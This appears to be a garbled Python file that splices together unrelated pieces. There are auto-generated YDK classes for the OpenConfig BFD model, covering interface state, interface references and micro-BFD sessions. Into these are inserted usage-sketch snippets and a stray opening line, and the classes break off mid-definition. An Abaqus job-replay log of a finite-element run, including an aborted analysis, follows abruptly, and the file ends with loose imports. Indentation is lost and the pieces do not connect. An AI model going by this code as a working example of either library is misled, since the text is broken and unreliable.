antimain = loadbase +
"""
Operational state parameters for BFD on the specified
interface.
.. attribute:: id
A unique identifier for the interface
**type**\: str
**config**\: False
.. attribute:: enabled
When this leaf is set to true then the BFD session is enabled on the specified interface \- if it is set to false, it is administratively disabled
**type**\: bool
**config**\: False
.. attribute:: local_address
The source IP address to be used for BFD sessions over this interface
**type**\: union of the below types:
**type**\: str
**pattern:** ^(([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])$
**type**\: str
**pattern:** ^(([0\-9a\-fA\-F]{1,4}\:){7}[0\-9a\-fA\-F]{1,4}\|([0\-9a\-fA\-F]{1,4}\:){1,7}\:\|([0\-9a\-fA\-F]{1,4}\:){1,6}\:[0\-9a\-fA\-F]{1,4}\|([0\-9a\-fA\-F]{1,4}\:){1,5}(\:[0\-9a\-fA\-F]{1,4}){1,2}\|([0\-9a\-fA\-F]{1,4}\:){1,4}(\:[0\-9a\-fA\-F]{1,4}){1,3}\|([0\-9a\-fA\-F]{1,4}\:){1,3}(\:[0\-9a\-fA\-F]{1,4}){1,4}\|([0\-9a\-fA\-F]{1,4}\:){1,2}(\:[0\-9a\-fA\-F]{1,4}){1,5}\|[0\-9a\-fA\-F]{1,4}\:((\:[0\-9a\-fA\-F]{1,4}){1,6})\|\:((\:[0\-9a\-fA\-F]{1,4}){1,7}\|\:))$
**config**\: False
.. attribute:: desired_minimum_tx_interval
The minimum interval between transmission of BFD control packets that the operator desires. This value is advertised to the peer, however the actual interval used is specified by taking the maximum of desired\-minimum\-tx\-interval and the value of the remote required\-minimum\-receive interval value. This value is specified as an integer number of microseconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: microseconds
.. attribute:: required_minimum_receive
The minimum interval between received BFD control packets that this system should support. This value is advertised to the remote peer to indicate the maximum frequency (i.e., minimum inter\-packet interval) between BFD control packets that is acceptable to the local system
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: microseconds
.. attribute:: detection_multiplier
The number of packets that must be missed to declare this session as down. The detection interval for the BFD session is calculated by multiplying the value of the negotiated transmission interval by this value
**type**\: int
**range:** 1..65535
**config**\: False
.. attribute:: enable_per_member_link
When this leaf is set to true \- BFD will be enabled on each member interface of the aggregated Ethernet bundle
**type**\: bool
**config**\: False
**default value**\: false
"""
_prefix = 'oc-bfd'
_revision = '2018-11-21'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Bfd.Interfaces.Interface.State, self).__init__()
self.yang_name = "state"
self.yang_parent_name = "interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('id', (YLeaf(YType.str, 'id'), ['str'])),
('enabled', (YLeaf(YType.boolean, 'enabled'), ['bool'])),
('local_address', (YLeaf(YType.str, 'local-address'), ['str','str'])),
('desired_minimum_tx_interval', (YLeaf(YType.uint32, 'desired-minimum-tx-interval'), ['int'])),
('required_minimum_receive', (YLeaf(YType.uint32, 'required-minimum-receive'), ['int'])),
('detection_multiplier', (YLeaf(YType.uint16, 'detection-multiplier'), ['int'])),
('enable_per_member_link', (YLeaf(YType.boolean, 'enable-per-member-link'), ['bool'])),
])
self.id = None
self.enabled = None
self.local_address = None
self.desired_minimum_tx_interval = None
self.required_minimum_receive = None
self.detection_multiplier = None
self.enable_per_member_link = None
self._segment_path = lambda: "state"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Bfd.Interfaces.Interface.State, ['id', 'enabled', 'local_address', 'desired_minimum_tx_interval', 'required_minimum_receive', 'detection_multiplier', 'enable_per_member_link'], name, value)
class InterfaceRef(_Entity_):
"""
Reference to an interface or subinterface
.. attribute:: config
Configured reference to interface / subinterface
**type**\: :py:class:`Config <ydk.models.openconfig.openconfig_bfd.Bfd.Interfaces.Interface.InterfaceRef.Config>`
.. attribute:: state
Operational state for interface\-ref
**type**\: :py:class:`State <ydk.models.openconfig.openconfig_bfd.Bfd.Interfaces.Interface.InterfaceRef.State>`
**config**\: False
"""
_prefix = 'oc-bfd'
_revision = '2018-11-21'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Bfd.Interfaces.Interface.InterfaceRef, self).__init__()
self.yang_name = "interface-ref"
self.yang_parent_name = "interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("config", ("config", Bfd.Interfaces.Interface.InterfaceRef.Config)), ("state", ("state", Bfd.Interfaces.Interface.InterfaceRef.State))])
self._leafs = OrderedDict()
self.config = Bfd.Interfaces.Interface.InterfaceRef.Config()
self.config.parent = self
self._children_name_map["config"] = "config"
self.state = Bfd.Interfaces.Interface.InterfaceRef.State()
self.state.parent = self
self._children_name_map["state"] = "state"
self._segment_path = lambda: "interface-ref"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Bfd.Interfaces.Interface.InterfaceRef, [], name, value)
class Config(_Entity_):
"""
Configured reference to interface / subinterface
.. attribute:: interface
Reference to a base interface. If a reference to a subinterface is required, this leaf must be specified to indicate the base interface
**type**\: str
**refers to**\: :py:class:`name <ydk.models.openconfig.openconfig_interfaces.Interfaces.Interface>`
.. attribute:: subinterface
Reference to a subinterface \-\- this requires the base interface to be specified using the interface leaf in this container. If only a reference to a base interface is required, this leaf should not be set
**type**\: int
**range:** 0..4294967295
**refers to**\: :py:class:`index <ydk.models.openconfig.openconfig_interfaces.Interfaces.Interface.Subinterfaces.Subinterface>`
"""
_prefix = 'oc-bfd'
_revision = '2018-11-21'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Bfd.Interfaces.Interface.InterfaceRef.Config, self).__init__()
self.yang_name = "config"
self.yang_parent_name = "interface-ref"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface', (YLeaf(YType.str, 'interface'), ['str'])),
('subinterface', (YLeaf(YType.str, 'subinterface'), ['int'])),
])
self.interface = None
self.subinterface = None
self._segment_path = lambda: "config"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Bfd.Interfaces.Interface.InterfaceRef.Config, ['interface', 'subinterface'], name, value)
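# Usage sketch (illustrative): per the docstrings above, a subinterface
# reference is only valid when the base interface leaf is also set. Values
# are placeholders.
from ydk.models.openconfig.openconfig_bfd import Bfd

iref = Bfd.Interfaces.Interface.InterfaceRef()
iref.config.interface = 'Ethernet1/1'   # base interface must be specified
iref.config.subinterface = 100          # optional; requires interface above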
class State(_Entity_):
"""
Operational state for interface\-ref
.. attribute:: interface
Reference to a base interface. If a reference to a subinterface is required, this leaf must be specified to indicate the base interface
**type**\: str
**refers to**\: :py:class:`name <ydk.models.openconfig.openconfig_interfaces.Interfaces.Interface>`
**config**\: False
.. attribute:: subinterface
Reference to a subinterface \-\- this requires the base interface to be specified using the interface leaf in this container. If only a reference to a base interface is required, this leaf should not be set
**type**\: int
**range:** 0..4294967295
**refers to**\: :py:class:`index <ydk.models.openconfig.openconfig_interfaces.Interfaces.Interface.Subinterfaces.Subinterface>`
**config**\: False
"""
_prefix = 'oc-bfd'
_revision = '2018-11-21'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Bfd.Interfaces.Interface.InterfaceRef.State, self).__init__()
self.yang_name = "state"
self.yang_parent_name = "interface-ref"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface', (YLeaf(YType.str, 'interface'), ['str'])),
('subinterface', (YLeaf(YType.str, 'subinterface'), ['int'])),
])
self.interface = None
self.subinterface = None
self._segment_path = lambda: "state"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Bfd.Interfaces.Interface.InterfaceRef.State, ['interface', 'subinterface'], name, value)
class MicroBfdSessions(_Entity_):
"""
Parameters relating to micro\-BFD sessions associated
with the interface.
.. attribute:: micro_bfd_session
This list contains configuration and state parameters relating to micro\-BFD session
**type**\: list of :py:class:`MicroBfdSession <ydk.models.openconfig.openconfig_bfd.Bfd.Interfaces.Interface.MicroBfdSessions.MicroBfdSession>`
"""
_prefix = 'oc-bfd'
_revision = '2018-11-21'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Bfd.Interfaces.Interface.MicroBfdSessions, self).__init__()
self.yang_name = "micro-bfd-sessions"
self.yang_parent_name = "interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("micro-bfd-session", ("micro_bfd_session", Bfd.Interfaces.Interface.MicroBfdSessions.MicroBfdSession))])
self._leafs = OrderedDict()
self.micro_bfd_session = YList(self)
self._segment_path = lambda: "micro-bfd-sessions"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Bfd.Interfaces.Interface.MicroBfdSessions, [], name, value)
class MicroBfdSession(_Entity_):
"""
This list contains configuration and state parameters
relating to micro\-BFD session.
.. attribute:: member_interface (key)
A reference to the member interface of the link aggregate
**type**\: str
**refers to**\: :py:class:`member_interface <ydk.models.openconfig.openconfig_bfd.Bfd.Interfaces.Interface.MicroBfdSessions.MicroBfdSession.Config>`
.. attribute:: config
Configuration parameters for the micro\-BFD session
**type**\: :py:class:`Config <ydk.models.openconfig.openconfig_bfd.Bfd.Interfaces.Interface.MicroBfdSessions.MicroBfdSession.Config>`
.. attribute:: state
Operational state parameters for the micro\-BFD session
**type**\: :py:class:`State <ydk.models.openconfig.openconfig_bfd.Bfd.Interfaces.Interface.MicroBfdSessions.MicroBfdSession.State>`
**config**\: False
"""
_prefix = 'oc-bfd'
_revision = '2018-11-21'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Bfd.Interfaces.Interface.MicroBfdSessions.MicroBfdSession, self).__init__()
self.yang_name = "micro-bfd-session"
self.yang_parent_name = "micro-bfd-sessions"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['member_interface']
self._child_classes = OrderedDict([("config", ("config", Bfd.Interfaces.Interface.MicroBfdSessions.MicroBfdSession.Config)), ("state", ("state", Bfd.Interfaces.Interface.MicroBfdSessions.MicroBfdSession.State))])
self._leafs = OrderedDict([
('member_interface', (YLeaf(YType.str, 'member-interface'), ['str'])),
])
self.member_interface = None
self.config = Bfd.Interfaces.Interface.MicroBfdSessions.MicroBfdSession.Config()
self.config.parent = self
self._children_name_map["config"] = "config"
self.state = Bfd.Interfaces.Interface.MicroBfdSessions.MicroBfdSession.State()
self.state.parent = self
self._children_name_map["state"] = "state"
self._segment_path = lambda: "micro-bfd-session" + "[member-interface='" + str(self.member_interface) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Bfd.Interfaces.Interface.MicroBfdSessions.MicroBfdSession, ['member_interface'], name, value)
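# Usage sketch (illustrative): micro-bfd-session is a keyed list, so each
# entry's segment path embeds its key, e.g.
# micro-bfd-session[member-interface='Ethernet1/1']. The interface name is a
# placeholder.
from ydk.models.openconfig.openconfig_bfd import Bfd

sessions = Bfd.Interfaces.Interface.MicroBfdSessions()
session = Bfd.Interfaces.Interface.MicroBfdSessions.MicroBfdSession()
session.member_interface = 'Ethernet1/1'
sessions.micro_bfd_session.append(session)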
class Config(_Entity_):
"""
Configuration parameters for the micro\-BFD session.
.. attribute:: local_address
The local IP address used by the system for the micro\-BFD session specified
**type**\: union of the below types:
**type**\: str
**pattern:** ^(([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])$
**type**\: str
**pattern:** ^(([0\-9a\-fA\-F]{1,4}\:){7}[0\-9a\-fA\-F]{1,4}\|([0\-9a\-fA\-F]{1,4}\:){1,7}\:\|([0\-9a\-fA\-F]{1,4}\:){1,6}\:[0\-9a\-fA\-F]{1,4}\|([0\-9a\-fA\-F]{1,4}\:){1,5}(\:[0\-9a\-fA\-F]{1,4}){1,2}\|([0\-9a\-fA\-F]{1,4}\:){1,4}(\:[0\-9a\-fA\-F]{1,4}){1,3}\|([0\-9a\-fA\-F]{1,4}\:){1,3}(\:[0\-9a\-fA\-F]{1,4}){1,4}\|([0\-9a\-fA\-F]{1,4}\:){1,2}(\:[0\-9a\-fA\-F]{1,4}){1,5}\|[0\-9a\-fA\-F]{1,4}\:((\:[0\-9a\-fA\-F]{1,4}){1,6})\|\:((\:[0\-9a\-fA\-F]{1,4}){1,7}\|\:))$
.. attribute:: remote_address
The remote IP destination that should be used by the system for the micro\-BFD session specified
**type**\: union of the below types:
**type**\: str
**pattern:** ^(([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])$
**type**\: str
**pattern:** ^(([0\-9a\-fA\-F]{1,4}\:){7}[0\-9a\-fA\-F]{1,4}\|([0\-9a\-fA\-F]{1,4}\:){1,7}\:\|([0\-9a\-fA\-F]{1,4}\:){1,6}\:[0\-9a\-fA\-F]{1,4}\|([0\-9a\-fA\-F]{1,4}\:){1,5}(\:[0\-9a\-fA\-F]{1,4}){1,2}\|([0\-9a\-fA\-F]{1,4}\:){1,4}(\:[0\-9a\-fA\-F]{1,4}){1,3}\|([0\-9a\-fA\-F]{1,4}\:){1,3}(\:[0\-9a\-fA\-F]{1,4}){1,4}\|([0\-9a\-fA\-F]{1,4}\:){1,2}(\:[0\-9a\-fA\-F]{1,4}){1,5}\|[0\-9a\-fA\-F]{1,4}\:((\:[0\-9a\-fA\-F]{1,4}){1,6})\|\:((\:[0\-9a\-fA\-F]{1,4}){1,7}\|\:))$
.. attribute:: member_interface
Reference to a member link of the aggregate interface being described
**type**\: str
**refers to**\: :py:class:`name <ydk.models.openconfig.openconfig_interfaces.Interfaces.Interface.Config>`
"""
_prefix = 'oc-bfd'
_revision = '2018-11-21'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Bfd.Interfaces.Interface.MicroBfdSessions.MicroBfdSession.Config, self).__init__()
self.yang_name = "config"
self.yang_parent_name = "micro-bfd-session"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('local_address', (YLeaf(YType.str, 'local-address'), ['str','str'])),
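# Usage sketch (illustrative): local-address and remote-address are unions of
# the IPv4 and IPv6 string patterns documented above, so either address
# family is assigned as a plain string. Addresses are placeholders.
from ydk.models.openconfig.openconfig_bfd import Bfd

cfg = Bfd.Interfaces.Interface.MicroBfdSessions.MicroBfdSession.Config()
cfg.local_address = '192.0.2.1'      # IPv4 member of the union
cfg.remote_address = '2001:db8::1'   # IPv6 member of the union
cfg.member_interface = 'Ethernet1/1'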
0.0, 'step': 1,
'jobName': 'OneTaper3D', 'severe': 0, 'iterations': 0,
'phase': STANDARD_PHASE, 'equilibrium': 0})
mdb.jobs['OneTaper3D']._Message(MEMORY_ESTIMATE, {'phase': STANDARD_PHASE,
'jobName': 'OneTaper3D', 'memory': 347.897059440613})
mdb.jobs['OneTaper3D']._Message(COMPLETED, {'phase': STANDARD_PHASE,
'message': 'Analysis phase complete', 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(JOB_COMPLETED, {
'time': 'Wed Oct 19 10:33:42 2011', 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D'].submit(consistencyChecking=OFF)
mdb.jobs['OneTaper3D']._Message(STARTED, {'phase': BATCHPRE_PHASE,
'clientHost': 'kirchhoff', 'handle': 0, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': BATCHPRE_PHASE,
'message': 'DEGREE OF FREEDOM 4 IS NOT ACTIVE IN THIS MODEL AND CAN NOT BE RESTRAINED',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': BATCHPRE_PHASE,
'message': 'DEGREE OF FREEDOM 5 IS NOT ACTIVE IN THIS MODEL AND CAN NOT BE RESTRAINED',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': BATCHPRE_PHASE,
'message': '36 elements are distorted. Either the isoparametric angles are out of the suggested limits or the triangular or tetrahedral quality measure is bad. The elements have been identified in element set WarnElemDistorted.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ODB_FILE, {'phase': BATCHPRE_PHASE,
'file': '/home2/banerjee/Abaqus/AdvComp/OneTaper3DCZM/OneTaper3D.odb',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(COMPLETED, {'phase': BATCHPRE_PHASE,
'message': 'Analysis phase complete', 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STARTED, {'phase': STANDARD_PHASE,
'clientHost': 'kirchhoff', 'handle': 0, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STEP, {'phase': STANDARD_PHASE, 'stepId': 1,
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': STANDARD_PHASE,
'message': 'The 3-direction at one or more points in one or more layers in 228 elements as defined in *ORIENTATION are in the opposite direction to the element normals. Either the 1 or 2 and the 3-direction defined in *ORIENTATION will be reversed. The elements have been identified in element set WarnElem3DirOppElemNormalStep1Inc1.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ODB_FRAME, {'phase': STANDARD_PHASE, 'step': 0,
'frame': 0, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STATUS, {'totalTime': 0.0, 'attempts': 0,
'timeIncrement': 1.0, 'increment': 0, 'stepTime': 0.0, 'step': 1,
'jobName': 'OneTaper3D', 'severe': 0, 'iterations': 0,
'phase': STANDARD_PHASE, 'equilibrium': 0})
mdb.jobs['OneTaper3D']._Message(MEMORY_ESTIMATE, {'phase': STANDARD_PHASE,
'jobName': 'OneTaper3D', 'memory': 422.442700386047})
mdb.jobs['OneTaper3D']._Message(ODB_FRAME, {'phase': STANDARD_PHASE, 'step': 0,
'frame': 1, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STATUS, {'totalTime': 1.0, 'attempts': 1,
'timeIncrement': 1.0, 'increment': 1, 'stepTime': 1.0, 'step': 1,
'jobName': 'OneTaper3D', 'severe': 0, 'iterations': 2,
'phase': STANDARD_PHASE, 'equilibrium': 2})
mdb.jobs['OneTaper3D']._Message(END_STEP, {'phase': STANDARD_PHASE,
'stepId': 1, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(COMPLETED, {'phase': STANDARD_PHASE,
'message': 'Analysis phase complete', 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(JOB_COMPLETED, {
'time': 'Wed Oct 19 10:34:32 2011', 'jobName': 'OneTaper3D'})
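# The replay below (as recorded) switches Step-1 to a nonlinear analysis with
# automatic stabilization (dissipated-energy fraction) and much smaller time
# increments, changes BC-2 to a compressive displacement, and resubmits the job.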
mdb.models['Model-1'].steps['Step-1'].setValues(adaptiveDampingRatio=0.05,
continueDampingFactors=False, initialInc=1e-06, maxInc=0.01, maxNumInc=1000
, minInc=1e-07, nlgeom=ON, stabilizationMagnitude=0.0002,
stabilizationMethod=DISSIPATED_ENERGY_FRACTION)
mdb.models['Model-1'].boundaryConditions['BC-2'].setValues(u2=-0.02)
mdb.jobs['OneTaper3D'].submit(consistencyChecking=OFF)
mdb.jobs['OneTaper3D']._Message(STARTED, {'phase': BATCHPRE_PHASE,
'clientHost': 'kirchhoff', 'handle': 0, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': BATCHPRE_PHASE,
'message': 'DEGREE OF FREEDOM 4 IS NOT ACTIVE IN THIS MODEL AND CAN NOT BE RESTRAINED',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': BATCHPRE_PHASE,
'message': 'DEGREE OF FREEDOM 5 IS NOT ACTIVE IN THIS MODEL AND CAN NOT BE RESTRAINED',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': BATCHPRE_PHASE,
'message': '36 elements are distorted. Either the isoparametric angles are out of the suggested limits or the triangular or tetrahedral quality measure is bad. The elements have been identified in element set WarnElemDistorted.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ODB_FILE, {'phase': BATCHPRE_PHASE,
'file': '/home2/banerjee/Abaqus/AdvComp/OneTaper3DCZM/OneTaper3D.odb',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(COMPLETED, {'phase': BATCHPRE_PHASE,
'message': 'Analysis phase complete', 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STARTED, {'phase': STANDARD_PHASE,
'clientHost': 'kirchhoff', 'handle': 0, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STEP, {'phase': STANDARD_PHASE, 'stepId': 1,
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': STANDARD_PHASE,
'message': 'The 3-direction at one or more points in one or more layers in 228 elements as defined in *ORIENTATION are in the opposite direction to the element normals. Either the 1 or 2 and the 3-direction defined in *ORIENTATION will be reversed. The elements have been identified in element set WarnElem3DirOppElemNormalStep1Inc1.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ODB_FRAME, {'phase': STANDARD_PHASE, 'step': 0,
'frame': 0, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STATUS, {'totalTime': 0.0, 'attempts': 0,
'timeIncrement': 1e-06, 'increment': 0, 'stepTime': 0.0, 'step': 1,
'jobName': 'OneTaper3D', 'severe': 0, 'iterations': 0,
'phase': STANDARD_PHASE, 'equilibrium': 0})
mdb.jobs['OneTaper3D']._Message(MEMORY_ESTIMATE, {'phase': STANDARD_PHASE,
'jobName': 'OneTaper3D', 'memory': 423.494834899902})
mdb.jobs['OneTaper3D']._Message(STATUS, {'totalTime': 0.0, 'attempts': ' 1U',
'timeIncrement': 1e-06, 'increment': 1, 'stepTime': 0.0, 'step': 1,
'jobName': 'OneTaper3D', 'severe': 0, 'iterations': 9,
'phase': STANDARD_PHASE, 'equilibrium': 9})
mdb.jobs['OneTaper3D']._Message(STATUS, {'totalTime': 0.0, 'attempts': ' 2U',
'timeIncrement': 5e-07, 'increment': 1, 'stepTime': 0.0, 'step': 1,
'jobName': 'OneTaper3D', 'severe': 0, 'iterations': 9,
'phase': STANDARD_PHASE, 'equilibrium': 9})
mdb.jobs['OneTaper3D']._Message(STATUS, {'totalTime': 0.0, 'attempts': ' 3U',
'timeIncrement': 1.25e-07, 'increment': 1, 'stepTime': 0.0, 'step': 1,
'jobName': 'OneTaper3D', 'severe': 0, 'iterations': 7,
'phase': STANDARD_PHASE, 'equilibrium': 7})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': STANDARD_PHASE,
'message': 'There is zero FORCE everywhere in the model based on the default criterion. please check the value of the average FORCE during the current iteration to verify that the FORCE is small enough to be treated as zero. if not, please use the solution controls to reset the criterion for zero FORCE.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ERROR, {'phase': STANDARD_PHASE,
'message': 'Time increment required is less than the minimum specified',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STATUS, {'totalTime': 0.0, 'attempts': ' 4U',
'timeIncrement': 1e-07, 'increment': 1, 'stepTime': 0.0, 'step': 1,
'jobName': 'OneTaper3D', 'severe': 0, 'iterations': 9,
'phase': STANDARD_PHASE, 'equilibrium': 9})
mdb.jobs['OneTaper3D']._Message(ABORTED, {'phase': STANDARD_PHASE,
'message': 'Analysis phase failed due to errors', 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ERROR, {
'message': 'Abaqus/Standard Analysis exited with an error - Please see the message file for possible error messages if the file exists.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(JOB_ABORTED, {
'message': 'Abaqus/Standard Analysis exited with an error - Please see the message file for possible error messages if the file exists.',
'jobName': 'OneTaper3D'})
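# The run above cut back four times and aborted because the required time
# increment fell below minInc=1e-07; the replay responds by lowering the
# minimum increment to 1e-09 and resubmitting.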
mdb.models['Model-1'].steps['Step-1'].setValues(minInc=1e-09)
mdb.jobs['OneTaper3D'].submit(consistencyChecking=OFF)
mdb.jobs['OneTaper3D']._Message(STARTED, {'phase': BATCHPRE_PHASE,
'clientHost': 'kirchhoff', 'handle': 0, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': BATCHPRE_PHASE,
'message': 'DEGREE OF FREEDOM 4 IS NOT ACTIVE IN THIS MODEL AND CAN NOT BE RESTRAINED',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': BATCHPRE_PHASE,
'message': 'DEGREE OF FREEDOM 5 IS NOT ACTIVE IN THIS MODEL AND CAN NOT BE RESTRAINED',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': BATCHPRE_PHASE,
'message': '36 elements are distorted. Either the isoparametric angles are out of the suggested limits or the triangular or tetrahedral quality measure is bad. The elements have been identified in element set WarnElemDistorted.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ODB_FILE, {'phase': BATCHPRE_PHASE,
'file': '/home2/banerjee/Abaqus/AdvComp/OneTaper3DCZM/OneTaper3D.odb',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(COMPLETED, {'phase': BATCHPRE_PHASE,
'message': 'Analysis phase complete', 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STARTED, {'phase': STANDARD_PHASE,
'clientHost': 'kirchhoff', 'handle': 0, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STEP, {'phase': STANDARD_PHASE, 'stepId': 1,
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': STANDARD_PHASE,
'message': 'The 3-direction at one or more points in one or more layers in 228 elements as defined in *ORIENTATION are in the opposite direction to the element normals. Either the 1 or 2 and the 3-direction defined in *ORIENTATION will be reversed. The elements have been identified in element set WarnElem3DirOppElemNormalStep1Inc1.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ODB_FRAME, {'phase': STANDARD_PHASE, 'step': 0,
'frame': 0, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STATUS, {'totalTime': 0.0, 'attempts': 0,
'timeIncrement': 1e-06, 'increment': 0, 'stepTime': 0.0, 'step': 1,
'jobName': 'OneTaper3D', 'severe': 0, 'iterations': 0,
'phase': STANDARD_PHASE, 'equilibrium': 0})
mdb.jobs['OneTaper3D']._Message(MEMORY_ESTIMATE, {'phase': STANDARD_PHASE,
'jobName': 'OneTaper3D', 'memory': 423.494834899902})
mdb.jobs['OneTaper3D']._Message(STATUS, {'totalTime': 0.0, 'attempts': ' 1U',
'timeIncrement': 1e-06, 'increment': 1, 'stepTime': 0.0, 'step': 1,
'jobName': 'OneTaper3D', 'severe': 0, 'iterations': 9,
'phase': STANDARD_PHASE, 'equilibrium': 9})
mdb.jobs['OneTaper3D']._Message(STATUS, {'totalTime': 0.0, 'attempts': ' 2U',
'timeIncrement': 2.5e-07, 'increment': 1, 'stepTime': 0.0, 'step': 1,
'jobName': 'OneTaper3D', 'severe': 0, 'iterations': 5,
'phase': STANDARD_PHASE, 'equilibrium': 5})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': STANDARD_PHASE,
'message': 'There is zero FORCE everywhere in the model based on the default criterion. please check the value of the average FORCE during the current iteration to verify that the FORCE is small enough to be treated as zero. if not, please use the solution controls to reset the criterion for zero FORCE.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STATUS, {'totalTime': 0.0, 'attempts': ' 3U',
'timeIncrement': 6.25e-08, 'increment': 1, 'stepTime': 0.0, 'step': 1,
'jobName': 'OneTaper3D', 'severe': 0, 'iterations': 9,
'phase': STANDARD_PHASE, 'equilibrium': 9})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': STANDARD_PHASE,
'message': 'There is zero FORCE everywhere in the model based on the default criterion. please check the value of the average FORCE during the current iteration to verify that the FORCE is small enough to be treated as zero. if not, please use the solution controls to reset the criterion for zero FORCE.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ODB_FRAME, {'phase': STANDARD_PHASE, 'step': 0,
'frame': 1, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STATUS, {'totalTime': 3.125e-08, 'attempts': 4,
'timeIncrement': 3.125e-08, 'increment': 1, 'stepTime': 3.125e-08,
'step': 1, 'jobName': 'OneTaper3D', 'severe': 0, 'iterations': 4,
'phase': STANDARD_PHASE, 'equilibrium': 4})
mdb.jobs['OneTaper3D']._Message(STATUS, {'totalTime': 3.125e-08,
'attempts': ' 1U', 'timeIncrement': 3.125e-08, 'increment': 2,
'stepTime': 3.125e-08, 'step': 1, 'jobName': 'OneTaper3D', 'severe': 0,
'iterations': 6, 'phase': STANDARD_PHASE, 'equilibrium': 6})
mdb.jobs['OneTaper3D']._Message(STATUS, {'totalTime':
# -*- coding: utf-8 -*-
import os
import json
